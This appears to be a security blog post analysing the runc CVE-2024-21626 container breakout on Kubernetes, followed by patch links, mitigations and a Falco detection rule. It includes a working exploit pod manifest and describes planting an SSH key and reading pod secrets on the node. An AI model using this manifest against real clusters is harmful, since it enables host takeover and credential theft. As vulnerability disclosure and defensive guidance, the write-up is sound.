CVE-2024-21626 container breakout on Kubernetes
Analysis of the CVE
On the 31st of January 2024, a new CVE was released for the runc
container runtime, which makes it possible to
breakout of a container.
The short summary of the CVE is that due to a file descriptor leak internally in runc
, it is possible to access the
host’s filesystem from within a container when starting the container with a specific working directory.
This effects runc
1.1.11 and earlier.
More info can be read in the very thorough CVE release in the runc
Github
repository opencontainers/runc/GHSA-xr7r-f8xq-vfvv
Since runc
is used as the container runtime for containerd
and containerd
is used for most Kubernetes clusters,
how will this CVE affect your Kubernetes cluster?
Are you protected against this CVE if you are enforcing the “restricted”
Pod Security Standard(PSS)
with an admission controller like Pod Security Admission,
Kyverno or Gatekeeper?
Can this CVE be exploited when you don’t allow root containers for example?
Let’s put on our hacker hat on and explore!
Translation of the CVE to a Kubernetes manifest
Let’s try attack 1 from the CVE documentation, if you set the container process.cwd
to /proc/self/fd/7/
(the 7 can
be environment specific and depends on the opening order in runc
) it will leave the host system accessible.
In your Kubernetes pod manifest the process.cwd
(cwd stands for current working directory) is set with the
spec.containers[].workingDir
.
I am also interested in testing if this CVE can be exploited when you are still compliant with the Pod Security
Standard. So in the following example I set the securityContext
as strict as possible so that the container
completely complies with the PSS and it would be allowed to run on the cluster, even with the “restricted”
enforced.
I chose to run as user 1000
since that is the default uid of the first user on Linux, this user probably exist on the
underlying node and that gives me write access to the user home folder and files allowed to write by members.
A simple sleep infinite
will keep the container running so I can kubectl exec -it
into the container to get
a shell.
---
apiVersion: v1
kind: Pod
metadata:
name: malicious-pod
namespace: cve-2024-21626
spec:
containers:
- name: container
image: alpine
workingDir: /proc/self/fd/7
command:
- sleep
- infinite
securityContext:
capabilities:
drop:
- ALL
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
seccompProfile:
type: RuntimeDefault
runAsNonRoot: true
runAsUser: 1000
Demonstration
So in the GIF below you can see three screens, the top screen shows the running pods in the cve-2024-21626
namespace. The bottom screen is a shell on the node were the pod runs via SSH.
First, in the bottom node shell I show the content of the ~/.ssh/authorized_keys
file to be empty.
Then I create the Kubernetes pod from the pod spec above, you can see it starting in the top screen.
The I use kubectl exec -it
to access the shell and lo and behold under the ../../../../
the node filesystem
is present!
As a demonstration I edit the ../../../../home/ubuntu/authorized_keys
to gain remote access to the ubuntu
user on
this node. And show on the node shell that it indeed has been edited on the node.
I have tested this pod on Azure AKS and a local cluster setup with Rancher RKE2 and on both I was able to get this working.
The only thing that takes some trail and error is the /proc/self/fd/7/
path, the number changes even on the same node.
Biggest success rate was with /proc/self/fd/7/
but /proc/self/fd/9/
was also common.
Implications
As seen in the demo above it is pretty ease to gain access to the node filesystem by exploiting the CVE. The demo above was pretty simple and required a shell to a container where I executed some manual steps. But this can be easily automated and put into a container image that looks normal but still adds a malicious SSH key or payload to the underlying node. Then this image only needs starting on the cluster to be effective.
As soon as someone has access to the node, your whole cluster is pretty much compromised. The pods running
on the node mount their secrets (database passwords, Kubernetes API tokens), configmaps and volumes under
/var/lib/kubelet/pods
so a quick look through those directories and you can have access to databases belonging to the apps.
Since those files and directories are readable by everyone on the system you don’t need to be root in the container to
access these.
# ls -l /var/lib/kubelet/pods/b68ccf8b-ebc9-4cd7-8454-92ead5d0887e/volumes/kubernetes.io~secret/config/
lrwxrwxrwx 1 root root 13 Feb 6 22:00 config.yaml -> ..data/config.yaml
So it is not just your Kubernetes cluster at risk, even services accessed from the cluster can now be at risk.
Mitigation and detection
As seen above it just having a tool that analyses the pod manifest (PSA, Kyverno, Gatekeeper) will fall short to catch this CVE.
Since you can run the pod with the most “restricted” pod security policy and still exploit this CVE.
The easiest mitigation would be to update to the latest patched runc
1.12.0 which is available as we speak.
Since most of you use a (cloud)product that integrates runc
here a set of links for reference in what
versions runc
has been patched:
- AWS/AWS-2024-001
- Azure/AKS#4080
- Google Cloud/GCP-2024-005
- k3s-io/k3s#9332 available in
v1.26.13+k3s2
v1.28.6+k3s2
v1.27.10+k3s2
v1.29.1+k3s2
If patching for some reason is not yet possible you can decrease the risk by allowing only images to be pulled from a trusted registry. To avoid a malicious image to be run from the internet by social engineering or by accident. This can be setup with the help of an admission controllers like Kyverno or Gatekeeper. You can create an admission policy where it only allows the image to be from a certain registry URL. It is then your responsibility to have secure images, the base image you build from could still be compromised.
For runtime detection, the awesome people of Snyk have made a detection tool available container breakouts or
“leaky vessels” as they call them. snyk/leaky-vessels-dynamic-detector
will watch and check for a set of possible container breakouts. You can run this tool as daemonset on Kubernetes for detection
of just CVE-2024-21626
or run it privileged on the node to detect all the mentioned vulnerabilities.
It will output on the stdout if an exploit is detected, you can setup alerts on these loglines to have detection.
Another way to detect if someone is exploiting this CVE is with Falco, the user @NitroCao shared this Falco rule on his
Github. But he places a asterisk that filtering false positives with proc.name != "runc:[1:CHILD]
is not a good solution
# source: https://github.com/NitroCao/CVE-2024-21626?tab=readme-ov-file#how-to-detect
- macro: container
condition: (container.id != host and container.name exists)
- rule: CVE-2024-21626 (runC escape through /proc/[PID]/cwd) exploited
desc: >
Detect CVE-2024-21626, runC escape vulnerability through /proc/[PID]/cwd.
condition: >
container and (
(evt.type = execve and proc.cwd startswith "/proc/self/fd") or
(evt.type in (open, openat, openat2) and fd.name glob "/proc/*/cwd/*") or
(evt.type in (symlink, symlinkat) and fs.path.target startswith "/proc/self/fd/")
) and proc.name != "runc:[1:CHILD]"
output: CVE-2024-21626 exploited (%container.info evt_type=%evt.type process=%proc.name command=%proc.cmdline target=%fs.path.targetraw)
priority: CRITICAL
So I would advise where possible to just upgrade to the latest runc
, then you are sure that this CVE has been mitigated.
Hopefully you found this post useful, it was for sure fun for me to play with this CVE :)